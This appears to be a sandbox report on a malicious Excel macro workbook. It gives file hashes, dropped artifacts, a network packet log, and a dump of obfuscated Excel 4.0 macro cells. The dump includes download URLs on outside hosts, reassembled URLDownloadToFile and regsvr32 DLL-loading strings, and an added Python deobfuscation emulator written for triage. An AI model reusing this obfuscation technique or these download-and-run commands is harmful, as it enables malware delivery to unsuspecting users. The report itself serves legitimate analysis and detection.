SHA-512: 7E6951CC1EFE2F72958F07F4F6DC35D6C94578176C4E677FA4A5AA6DC8048F06744CC1B45ED4F656E64112261D2665DD0C4394BDD1980C3719735F02F4F82125
Malicious: false
Reputation: low
Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-22T19:17:14">.. Build: 16.0.14221.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\12BD43E5.png
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type: PNG image data, 1133 x 589, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 75711
Entropy (8bit): 7.915372969602997
Encrypted: false
SSDEEP: 1536:gxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncT:7br0o45GUgHhX8jC9yST
MD5: 8296338A43942E3107802E3062AC1270
SHA1: 46E67A586ED8A961AF7FD03140547C1CB2BAC227
SHA-256: BE5F61F2AE8E4C9F9ADBCE5EC33D4C01A331734FFC5818AA8E45CF60456C5ABD
                                                                                                                                                    SHA-512:C2179050A009C990CBFE6EA45E44AA6307AAC938E3EA523D31713F657E09131B07ACEBB31FC353C5A23E7D6323C4EC01736CFF092ACA1D49B58E71A07F1171AD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .PNG........IHDR...m...M......p......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......g......q.|.....<...'r....-^..c.If.,ffX1K.[....Z....V.LO5L..J+...z.]]u..>.==.......................Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t........8.:.............................g@G........3............Q..........(.......p.t......j.7ZP...:...0S....z5T........).WU=j.*.$H.B.P.)l.6Q..'.l..7..k..J.o..._....6..{C...r.|2W.[a...m.BI.?...5......D....4;B...@b.HiP.jfj}@.S9..E.*J...O..BA5.e:...q!.SP....w....(..._.,..I.|a.7+>.........A#......3v..37......w(..j...C.R..H3.f.Q....0....h~...)aM..).vQ.1..+J@Q.....Oa+...!5.e.b...V..|..d../.......vC..&..=9...n.....^6-.tRj...O..{j.e.N....o..~..^.......#!...T...C.#.>.E,[.,......E....h~B.Y./....(2.......(...`....~w#.%..R..{........N.Z....k]8>..dW..^s....U...9...W.e...]...W...i.{u.>.s.,L.>1..)....f..b..Z.nai$.Q.."...W2.......Q...G...z....Ea......
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\9DC40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):93025
                                                                                                                                                    Entropy (8bit):7.835909433031108
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:TsxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncLHdVlz9:TXbr0o45GUgHhX8jC9ySLHBh
                                                                                                                                                    MD5:3BDF2667F12D4D905D0DC4AFC01E4C63
                                                                                                                                                    SHA1:9D26FEFA0B736F038570EFB98D8755B7D0930AE2
                                                                                                                                                    SHA-256:2F2B4F6BBCE9B1246B9D99752EC70FAFDBBDFF8A8FC2020A758EB35C5109C0D3
                                                                                                                                                    SHA-512:C5105394DCCD97D89839D4096019F7C84A5DC45E222D9D473E1AC740EE5F069C020D59D4C7EBA276C9CD3E047C2580FB83785DED1E0D2A638D91A84B6153039F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .V.n.0....?.........r.Y.m...@.c.07p.....e.m.....m...q...jaM....w5;.F..'.......++0.....j..dW..O..e.,(.a...7.Q.`.V>.....V$z...B.E..|4......)c....f...vA.WJ...z._.....h)....N.!).l.%(/.,AW."..-@...Q.c|..(1d|.3.....Ys.>....~2{.*..R.V.<%..a.#........ZAq/b..,......8.z?.6.d3-...`........S.4&.{U....D...v...H6._...S........B.gv6e=.9.7....v...t..T...}.X./.Kw............R.......p.......C...9..?...PQ.d...8...h./5....R......m*G... &..F5......n.'..j..w'../.......PK..........!.!=J.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Jun 22 18:17:21 2021, atime=Tue Jun 22 18:17:21 2021, length=12288, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.668812718446673
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8vXU/duCH2KOg4dc4L6f8+WrjAZ/DYbD+SeuSeL44t2Y+xIBjKZm:8QigmK2AZbcDg7aB6m
                                                                                                                                                    MD5:AC114E5AF0816A9FFEBCDDF67409B7D1
                                                                                                                                                    SHA1:19C55A294B5D04C4627FB777C450A4DA8BF5882C
                                                                                                                                                    SHA-256:8229291C89D45BBD3B32FB1688BEA4444CC78C78710389D3C6FB6BA37C85AA55
                                                                                                                                                    SHA-512:0D49F48BD71D73BDF63C96922856548A886868D0177C246D1433BF7161C765966600DDB798E385DB99B6CD7F795D18EDA323B392756D2E839D23362EDDD62000
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.............-..8..9.g.....9.g...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R......#J.....................T..j.o.n.e.s.....~.1......R+...Desktop.h.......N...R+......Y..............>.....p.).D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\idea-22543577.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:52 2020, mtime=Tue Jun 22 18:17:22 2021, atime=Tue Jun 22 18:17:22 2021, length=93025, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2150
                                                                                                                                                    Entropy (8bit):4.7168949323016856
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8ht7igmnAkCY5nhACbUjQnjD47aB6myht7igmnAkCY5nhACbUjQnjD47aB6m:877ixJnyCiQnlB6p77ixJnyCiQnlB6
                                                                                                                                                    MD5:5F23734177853EFE4B1E30E48651F5B1
                                                                                                                                                    SHA1:0CCCD5FB9265BFEF5BCDA0FC255263D48ACD433F
                                                                                                                                                    SHA-256:629DB93CCB986DC37646B5DACCAD835A2F8DA5E4789B30FA0EE0A7D46199AB23
                                                                                                                                                    SHA-512:99B2A76C403EFCD034EA5A9300061346AED94DDED7F28FEF396CC3AD9091B1F8F1C2490994F8D05594011752BBD9C7FF5F8105CF7467521108F74759217D90CA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... .....CS.....f.9.g...f.9.g..ak...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R......................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q|<..user.<.......N...R......#J.....................T..j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N...R.......Y..............>......lN.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2..l...R$. .IDEA-2~1.XLS..V......>Q{<.R$......V..................../...i.d.e.a.-.2.2.5.4.3.5.7.7...x.l.s.m.......X...............-.......W...........>.S......C:\Users\user\Desktop\idea-22543577.xlsm..).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.i.d.e.a.-.2.2.5.4.3.5.7.7...x.l.s.m.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj..................!a..%.H.VZAj.............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):94
                                                                                                                                                    Entropy (8bit):4.621739484560059
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomxWHzXdUlUBhXXdUlmxWHzXdUlv:dj07bxy7E
                                                                                                                                                    MD5:E7873154CD23EE19AAA8800DC776A9B5
                                                                                                                                                    SHA1:BB75A07FBBC9BE7C5F38BB058ED8198336C4F73C
                                                                                                                                                    SHA-256:6E67DB062BE87713F064EF905334EB421CC07ABB115DD7975323EF1EDBAD4F13
                                                                                                                                                    SHA-512:8844B76DFF4AF8A235E5B791ADD65A951FEF222C64450AC98D2F3C94F7B08791A1DC64F5DFECC90EE228EF82BB0D0918E6AE77E9E836D8541FD0F4934026D45C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[misc]..idea-22543577.LNK=0..idea-22543577.LNK=0..[misc]..idea-22543577.LNK=0..
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\9EC40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):93025
                                                                                                                                                    Entropy (8bit):7.835909433031108
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:TsxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncLHdVlz9:TXbr0o45GUgHhX8jC9ySLHBh
                                                                                                                                                    MD5:3BDF2667F12D4D905D0DC4AFC01E4C63
                                                                                                                                                    SHA1:9D26FEFA0B736F038570EFB98D8755B7D0930AE2
                                                                                                                                                    SHA-256:2F2B4F6BBCE9B1246B9D99752EC70FAFDBBDFF8A8FC2020A758EB35C5109C0D3
                                                                                                                                                    SHA-512:C5105394DCCD97D89839D4096019F7C84A5DC45E222D9D473E1AC740EE5F069C020D59D4C7EBA276C9CD3E047C2580FB83785DED1E0D2A638D91A84B6153039F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: .V.n.0....?.........r.Y.m...@.c.07p.....e.m.....m...q...jaM....w5;.F..'.......++0.....j..dW..O..e.,(.a...7.Q.`.V>.....V$z...B.E..|4......)c....f...vA.WJ...z._.....h)....N.!).l.%(/.,AW."..-@...Q.c|..(1d|.3.....Ys.>....~2{.*..R.V.<%..a.#........ZAq/b..,......8.z?.6.d3-...`........S.4&.{U....D...v...H6._...S........B.gv6e=.9.7....v...t..T...}.X./.Kw............R.......p.......C...9..?...PQ.d...8...h./5....R......m*G... &..F5......n.'..j..w'../.......PK..........!.!=J.............[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\Desktop\~$idea-22543577.xlsm
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):330
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                    MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                    SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                    SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                    SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.835191332560826
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                    • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                    File name:idea-22543577.xlsm
                                                                                                                                                    File size:93205
                                                                                                                                                    MD5:690a255b0f1b59b3421800bab8b41c10
                                                                                                                                                    SHA1:1036eaadc0201b50d3d005ad05e208888021b945
                                                                                                                                                    SHA256:2aba85eff52ce4b7d41b651baec98fea810a3307dc2b90bebf1c68131018cb0f
                                                                                                                                                    SHA512:a124c5e4e8cdacc52e84ab89e92f83cbf535b3757271fde02bdb8b9b254c10f1bc2a05e09ed2dc9f3b1f605f698da6970048ea4fc187375c860b745cb551f8d1
                                                                                                                                                    SSDEEP:1536:CaxJQVyZEbrMj34410mHyL9c988gHhX8jCNnKfl5ncEya2/dLBT0y:Clbr0o45GUgHhX8jC9ySXDLB/
                                                                                                                                                    File Content Preview:PK..........!.!=J.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd0e2f696908c

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "idea-22543577.xlsm"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    "=FORMULA.FILL(Sheet1!AQ130&Sheet1!AQ131&Sheet1!AQ132,Sheet1!AQ148)""=FORMULA.FILL(Sheet1!AQ114&Sheet1!AQ115&Sheet1!AQ116&Sheet1!AQ117&Sheet1!AQ118,Sheet1!AQ149)=Sheet2!AG2()"
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AS135&Sheet1!AS136&Sheet1!AS137&Sheet1!AS138,Sheet1!AQ151)=Sheet1!AO131()"
                                                                                                                                                    ,,,,,,,,,,"=""..\wail1.dll""",,,,"=""..\wail2.dll""",,,,,,,,"=""https://senderoalcielo.com/0wq1jKHt/leef.html""",,,,"=""https://theottomandoner.com/gYiFGeXMa9/leef.html""",,,,,,,,,,,,,,,,,JJ,,,URLDow,CC,,,nload,BB,,,To,,,,Fil,,,,"=RIGHT(""rsthYFGIPUYiugeA"",2)",,,,,,,,,,,,,,,,=,=,,,,CALL,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""URL""",,,,M,,,,"=RIGHT(""ijkmzfviuhjdfbvon"",2)",,"=FORMULA.FILL(AQ122&AQ151&before.3.102.40.sheet!AQ154&before.3.102.40.sheet!AQ105&before.3.102.40.sheet!AR135,before.3.102.40.sheet!AO150)",,,,"=FORMULA.FILL(AQ122&AQ151&before.3.102.40.sheet!AQ154&before.3.102.40.sheet!AQ106&before.3.102.40.sheet!AR135,before.3.102.40.sheet!AO151)",,0,,,,,""")",E,,"(""","(""",X,,r,"""",E,,e,&,C,,g,),,,s,",",,,vr,,,,3,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AR113&Sheet1!AR114&Sheet1!AR115,Sheet1!AQ150)""=FORMULA.FILL(Sheet1!AR122&Sheet1!AR123&Sheet1!AR136&Sheet1!AQ148&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ149&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ150&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ108&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ105&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR142&Sheet1!AR139,Sheet1!AO148)=Sheet4!AI4()"
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AQ136&Sheet1!AQ137&Sheet1!AQ138&Sheet1!AQ139&Sheet1!AQ140&Sheet1!AQ141&Sheet1!AQ142&""2 "",Sheet1!AQ154)=Sheet7!AR6()"
                                                                                                                                                    "=FORMULA.FILL(Sheet1!AR122&Sheet1!AR123&Sheet1!AR136&Sheet1!AQ148&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ149&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ150&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ109&Sheet1!AR137&Sheet1!AR140&Sheet1!AR137&Sheet1!AQ106&Sheet1!AR137&Sheet1!AR140&Sheet1!AR142&Sheet1!AR140&Sheet1!AR142&Sheet1!AR139,Sheet1!AO149)=Sheet5!AM2()"

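The dump above shows how this loader hides its strings: no single cell contains URLDownloadToFileA, URLMon or the regsvr32 command line. The & concatenations pull two- to six-character fragments from scattered cells ("URLDow", "nload", "To", "Fil"; "URL", "M"; E, X, E, C; "..\wail1.dll"), RIGHT() peels the last characters off decoy strings such as rsthYFGIPUYiugeA ("eA") and ijkmzfviuhjdfbvon ("on"), and FORMULA.FILL writes the assembled text into a fresh cell that is only then executed. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it emulates just that subset of XLM (string literals, &, RIGHT, FORMULA.FILL) over a constructed sheet whose fragment values are copied from the dump, while the cell addresses and the exact shape of the EXEC() staging formula are assumptions. The point it makes is that a substring scan of raw cell text finds nothing, whereas the same scan after staging and resolution recovers the API name and the command line.

```python
"""Reassemble scattered Excel 4.0 (XLM) macro strings.
Added example, not code from the Joe Sandbox report or the sample: cell
addresses are placeholders, fragment values come from the dump above, and
the EXEC staging formula in H1 is an assumed reconstruction."""
import re

SUSPICIOUS = ("URLDownloadToFile", "URLMon", "EXEC", "CALL", "regsvr32")

# Constructed sparse sheet: every fragment is harmless alone; the formulas assemble them.
SHEET = {
    "A1": "URLDow", "A2": "nload", "A3": "To", "A4": "Fil",
    "A5": '=RIGHT("rsthYFGIPUYiugeA",2)',       # -> "eA"
    "B1": "URL", "B2": "M",
    "B3": '=RIGHT("ijkmzfviuhjdfbvon",2)',      # -> "on"
    "C1": "=A1&A2&A3&A4&A5",                    # -> URLDownloadToFileA
    "C2": "=B1&B2&B3",                          # -> URLMon
    "E1": "E", "E2": "X", "E3": "C",
    "F1": "r", "F2": "e", "F3": "g", "F4": "s", "F5": "vr", "F6": "3",
    "F7": '=F1&F2&F3&F4&F5&F6&"2 "',            # -> "regsvr32 "
    "G1": r'="..\wail1.dll"',
    # Assumed staging step: write the assembled =EXEC(...) formula into H2.
    "H1": r'=FORMULA.FILL("="&E1&E2&E1&E3&"("""&F7&G1&""")",H2)',
}

def split_top_level(expr, sep):
    """Split on `sep` where it occurs outside string literals and parentheses."""
    parts, buf, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str          # a doubled "" toggles twice, harmlessly
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(buf))
                buf = []
                continue
        buf.append(ch)
    parts.append("".join(buf))
    return parts

def eval_cell(sheet, ref, depth=0):
    """String a cell evaluates to; formulas are followed recursively."""
    value = sheet.get(ref.split("!")[-1].replace("$", ""), "")
    if not isinstance(value, str) or not value.startswith("="):
        return str(value)
    return eval_expr(sheet, value[1:], depth + 1)

def eval_expr(sheet, expr, depth):
    if depth > 50:                       # hostile sheets may reference in cycles
        raise RecursionError("reference cycle in formula chain")
    return "".join(eval_term(sheet, t.strip(), depth) for t in split_top_level(expr, "&"))

def eval_term(sheet, term, depth):
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1].replace('""', '"')   # XLM doubles quotes inside literals
    m = re.fullmatch(r"RIGHT\((.*),\s*(\d+)\)", term, re.S | re.I)
    if m:
        text, n = eval_expr(sheet, m.group(1), depth), int(m.group(2))
        return text[-n:] if n else ""
    if re.fullmatch(r"(?:[^!]+!)?\$?[A-Z]{1,3}\$?\d+", term):
        return eval_cell(sheet, term, depth)
    raise ValueError(f"unsupported term: {term!r}")

def run_formula_fills(sheet):
    """Emulate FORMULA.FILL(expr, target): write the assembled formula into `target`."""
    staged = dict(sheet)
    for value in sheet.values():
        if isinstance(value, str) and value.upper().startswith("=FORMULA.FILL("):
            inner = re.fullmatch(r"FORMULA\.FILL\((.*)\)", value[1:], re.S | re.I).group(1)
            expr, target = split_top_level(inner, ",")
            staged[target.strip().split("!")[-1]] = eval_expr(staged, expr, 1)
    return staged

def resolve_all(sheet):
    """Resolved text per cell; cells calling EXEC/CALL/HALT etc. keep their raw formula."""
    out = {}
    for ref, value in sheet.items():
        try:
            out[ref] = eval_cell(sheet, ref)
        except ValueError:
            out[ref] = str(value)
    return out

def scan(cells):
    """Case-insensitive indicator scan -> {cell: [indicators]}."""
    return {ref: found for ref, text in cells.items()
            if (found := [s for s in SUSPICIOUS if s.lower() in text.lower()])}

def analyse(sheet):
    """(hits on raw cell text, hits after FORMULA.FILL staging and resolution)."""
    return scan({r: str(v) for r, v in sheet.items()}), scan(resolve_all(run_formula_fills(sheet)))

if __name__ == "__main__":
    raw, resolved = analyse(SHEET)
    print("raw cell text:", raw)         # {} - nothing to match before reassembly
    print("after resolve:", resolved)
```

Run it directly and the raw scan returns an empty dict while the resolved scan reports C1 (URLDownloadToFile), C2 (URLMon), F7 (regsvr32) and the staged H2 (EXEC, regsvr32). The emulator deliberately stops at EXEC, CALL and HALT: it resolves strings but never executes anything, which is the right boundary for a triage script. Real samples also use CHAR(), MID() and cross-sheet FORMULA targets, which this subset does not model.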
                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
Jun 22, 2021 21:17:24.136331081 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:24.300487041 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.300600052 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:24.301671982 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:24.466195107 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.471456051 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.471483946 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.471496105 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.471504927 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.471612930 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:24.471681118 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:24.474009037 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:24.474104881 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:25.566932917 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:25.734215021 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:25.734401941 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:25.741549015 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:25.951594114 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:26.145864010 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:26.145915031 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:26.146563053 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:26.188066006 CEST  49738  443  192.168.2.4  108.167.165.249
Jun 22, 2021 21:17:26.284532070 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.340698957 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.340786934 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.341625929 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.358668089 CEST  443  49738  108.167.165.249  192.168.2.4
Jun 22, 2021 21:17:26.396037102 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.397129059 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.397159100 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.397185087 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.397190094 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.397209883 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.397226095 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.397233009 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.397254944 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.400989056 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.401088953 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.410912037 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.466242075 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:26.466324091 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.467329979 CEST  49740  443  192.168.2.4  5.100.155.169
Jun 22, 2021 21:17:26.562869072 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:27.320400000 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:27.320712090 CEST  443  49740  5.100.155.169  192.168.2.4
Jun 22, 2021 21:17:27.320883989 CEST  49740  443  192.168.2.4  5.100.155.169
